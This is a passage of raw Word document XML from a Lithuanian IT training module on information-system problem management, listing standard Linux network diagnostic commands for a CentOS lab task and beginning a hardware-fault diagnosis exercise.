          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41B98B" w14:textId="4AED391A" w:rsidR="00831534" w:rsidRPr="005A5C28" w:rsidRDefault="002A5374" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="371EE17E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0-A.</w:t>
      </w:r>
      <w:r w:rsidR="70537475" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6464FFF2" w14:textId="7283D7A0" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="2EDD734A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Informacinės sistemos problemų valdymas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C4DA9" w14:textId="1BCA0FBE" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="085CE88C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118A28C3" w14:textId="77777777" w:rsidR="007D6F00" w:rsidRPr="005A5C28" w:rsidRDefault="007D6F00" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NAUDOTI IS DIAGNOSTINES PRIEMONES IR ĮRANKIUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2506B8" w14:textId="16F9AC3B" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00753244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti įdiegtos virtualios mašinos (VirtualBox arba VMware workstation player) ir C</w:t>
      </w:r>
      <w:r w:rsidR="1E6EE6D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS operacinės sistemos</w:t>
      </w:r>
      <w:r w:rsidR="00753244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bei</w:t>
      </w:r>
      <w:r w:rsidR="1FF7959C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>panaudotų</w:t>
      </w:r>
      <w:r w:rsidR="00753244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komandų </w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ekrano atvaizdus</w:t>
      </w:r>
      <w:r w:rsidR="00753244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/sąrašus</w:t>
      </w:r>
      <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31CD46" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="0EC6BF79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A66AD" w14:textId="58AF6E92"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Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC2F87" w14:textId="1BCA0FBE"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ifup eth0 (Enable eth0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D4327" w14:textId="1BCA0FBE"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ifconfig eth0 mtu XXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CECE017" w14:textId="1BCA0FBE"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ifconfig eth0 – promisc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16143865" w14:textId="1BCA0FBE"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ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38497231" w14:textId="1BCA0FBE"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traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1AF06B" w14:textId="1BCA0FBE"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Netstat – r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C66B3" w14:textId="1BCA0FBE"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Dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEE0B9" w14:textId="1BCA0FBE"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Nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A9754" w14:textId="1BCA0FBE"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Route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B05BF9" w14:textId="1BCA0FBE"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route add -net 10.10.10.0/24 gw 192.168.0.1 (Route Adding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89BE5F" w14:textId="1BCA0FBE"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route del -net 10.10.10.0/24 gw 192.168.0.1 (Route Deleting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9CAC39" w14:textId="1BCA0FBE"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route add default gw 192.168.0.1 (Adding default Gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F240DA" w14:textId="668B4F84"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host</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(host -t CNAME </w:t>
      </w:r>
      <w:hyperlink r:id="rId241">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>www.redhat.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD49EB" w14:textId="1BCA0FBE"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arp -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F597B2" w14:textId="1BCA0FBE"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ethtool eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6684D284" w14:textId="1BCA0FBE"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iwconfig [interface]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73212917" w14:textId="1BCA0FBE" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="0EC6BF79"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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29221496" w14:textId="6901756C" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="14551A5B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>system-config-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38031CEE" w14:textId="6901756C" w:rsidR="009F2FBB" w:rsidRPr="005A5C28" w:rsidRDefault="009F2FBB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E15946" w14:textId="6901756C" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="76AFE9B6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="676BF334" wp14:editId="1240582C">
            <wp:extent cx="3762375" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79270631" name="Picture 7927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70631"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId242">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3762375" cy="2638425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D89B4" w14:textId="0944CDF4" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="0EC6BF79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 pav.</w:t>
      </w:r>
      <w:r w:rsidR="1CCB40D5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Grafinis įrankis</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skirtas sistemos tinkle konfigūravimui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462FD8E3" w14:textId="1D015183" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="0EC6BF79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: 13 Linux Network Configuration and Troubleshooting Commands</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3ACFCA" w14:textId="1BCA0FBE" w:rsidR="06A1AA77" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId243">
        <w:r w:rsidR="0EC6BF79" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30BE4330" w14:textId="39B0BF61" w:rsidR="085CE88C" w:rsidRPr="005A5C28" w:rsidRDefault="085CE88C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C05FEF" w14:textId="77777777" w:rsidR="007D6F00" w:rsidRPr="005A5C28" w:rsidRDefault="007D6F00" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUSTATYTI KOMPIUTERINĖS SISTEMOS APARATINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56555294" w14:textId="070950BC" w:rsidR="000F31F2" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00753244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="32B5D1A3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="32B5D1A3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Mokinys turi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įvardinti gedimą, nustatyti jo priežastį</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir pateikti gedimo šalinimo būdus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C4F18" w14:textId="224DE131" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2A0EC8" w14:textId="5A9CE865" w:rsidR="42E09ECF" w:rsidRPr="005A5C28" w:rsidRDefault="32B5D1A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F295B" w14:textId="45F7576B" w:rsidR="42E09ECF" w:rsidRPr="005A5C28" w:rsidRDefault="32B5D1A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jei </w:t>
      </w:r>
      <w:r w:rsidR="00D93E1A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nepasileidžia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> operacinė sistema</w:t>
      </w:r>
      <w:r w:rsidR="4D604241" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="70534C0D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>žėjus į BIOS</w:t>
      </w:r>
      <w:r w:rsidR="14B32ACA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> HDD ar SSD nėra matomas</w:t>
      </w:r>
      <w:r w:rsidR="5FDD2F59" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> negalima pasirinkti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>jo per</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="34E3B66D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paleid</w:t>
      </w:r>
      <w:r w:rsidR="34E3B66D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">imo </w:t>
      </w:r>
      <w:r w:rsidR="006F4A78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="34E3B66D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ustatymus</w:t>
      </w:r>
      <w:r w:rsidR="006F4A78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0671FBC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006F4A78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">angl. - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Boot </w:t>
      </w:r>
      <w:r w:rsidR="5C6BB043" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ptions</w:t>
      </w:r>
      <w:r w:rsidR="037856A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Jei dirbant kompiuteriu</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jo viduje girdimas traškesys, ypač jei</w:t>
      </w:r>
      <w:r w:rsidR="000F31F2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuo pat metu</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sutampa su kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="6E49BB2F" w:rsidRPr="005A5C28">
        <w:rPr>
